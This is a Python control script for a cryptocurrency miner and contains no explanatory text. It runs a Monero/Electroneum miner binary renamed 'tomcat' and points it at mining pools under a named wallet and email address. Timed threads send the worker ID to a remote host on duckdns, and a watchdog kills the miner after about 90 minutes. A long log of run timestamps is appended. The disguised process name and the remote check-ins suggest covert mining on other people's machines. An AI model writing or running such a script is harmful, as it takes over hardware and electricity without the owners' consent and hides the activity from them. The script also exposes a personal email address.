import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:05.794680
#2018-02-17 17:19:03.554761
#2018-02-17 19:07:01.807782
#2018-02-17 20:56:02.570386
#2018-02-17 22:41:07.895663
#2018-02-18 00:24:08.698775
#2018-02-18 02:15:08.331309
#2018-02-18 04:02:03.552050
#2018-02-18 05:53:05.281921
#2018-02-18 07:44:03.411015
#2018-02-18 09:33:05.366532
#2018-02-18 11:19:04.855078
#2018-02-18 13:05:06.380951
#2018-02-18 14:53:04.049634
#2018-02-18 16:40:08.610679
#2018-02-18 18:29:06.036083
#2018-02-18 20:17:01.419827
#2018-02-18 22:02:07.109190
#2018-02-18 23:51:06.425555
#2018-02-19 01:37:02.152452
#2018-02-19 03:24:06.668880
#2018-02-19 05:09:04.134795
#2018-02-19 06:56:06.971683
#2018-02-19 08:46:05.422927
#2018-02-19 10:37:05.326128
#2018-02-19 12:24:07.535473
#2018-02-19 14:10:10.923507
#2018-02-19 15:58:04.586256
#2018-02-19 17:48:06.118675
#2018-02-19 19:34:06.020925
#2018-02-19 21:21:06.969671
#2018-02-19 23:07:03.955138
#2018-02-20 00:51:06.311585
#2018-02-20 02:39:07.150291
#2018-02-20 04:28:06.097995
#2018-02-20 06:13:04.991094
#2018-02-20 07:58:07.704940
#2018-02-20 09:43:03.813620
#2018-02-20 11:27:01.748776
#2018-02-20 13:13:08.883716
#2018-02-20 14:59:05.239260
#2018-02-20 16:44:09.332172
#2018-02-20 18:32:04.679532
#2018-02-20 20:23:08.151729
#2018-02-20 22:08:04.581865
#2018-02-20 23:50:08.616400
#2018-02-21 01:36:07.900547
#2018-02-21 03:24:01.622347
#2018-02-21 05:12:05.140076
#2018-02-21 07:01:05.255944
#2018-02-21 08:47:06.485760
#2018-02-21 10:33:04.747910
#2018-02-21 12:21:08.171950
#2018-02-21 14:09:05.196129
#2018-02-21 15:56:08.476934
#2018-02-21 17:48:06.808596
#2018-02-21 19:33:07.149244
#2018-02-21 21:21:06.276880
#2018-02-21 23:07:08.225690
#2018-02-22 00:56:05.131663
#2018-02-22 02:43:01.694633
#2018-02-22 04:30:09.697137
#2018-02-22 06:17:06.676457
#2018-02-22 08:03:05.932242
#2018-02-22 09:51:01.928704
#2018-02-22 11:36:07.945928
#2018-02-22 13:23:07.294800
#2018-02-22 15:12:01.985018
#2018-02-22 16:56:01.556578
#2018-02-22 18:43:11.273790
#2018-02-22 20:36:07.837349
#2018-02-22 22:22:04.368265
#2018-02-23 00:08:06.009670
#2018-02-23 01:55:08.545062
#2018-02-23 03:42:07.938081
#2018-02-23 05:28:03.728734
#2018-02-23 07:13:04.646819
#2018-02-23 09:18:05.433766
#2018-02-23 11:25:08.502832
#2018-02-23 13:16:02.154372
#2018-02-23 15:01:06.344531
#2018-02-23 16:49:05.932206
#2018-02-23 18:39:07.041157
#2018-02-23 20:26:08.163808
#2018-02-23 22:13:06.615510
#2018-02-24 00:01:01.633781
#2018-02-24 01:50:07.816004
#2018-02-24 03:39:07.314840
#2018-02-24 05:24:01.438426
#2018-02-24 07:12:03.465439
#2018-02-24 09:00:08.125396
#2018-02-24 11:01:03.878012
#2018-02-24 12:49:03.685011
#2018-02-24 14:38:04.600921
#2018-02-24 16:27:06.284871
#2018-02-24 18:18:07.469643
#2018-02-24 20:04:04.899653
#2018-02-24 21:47:03.127662
#2018-02-25 00:47:04.742051
#2018-02-25 04:39:01.580981
#2018-02-25 08:05:04.683485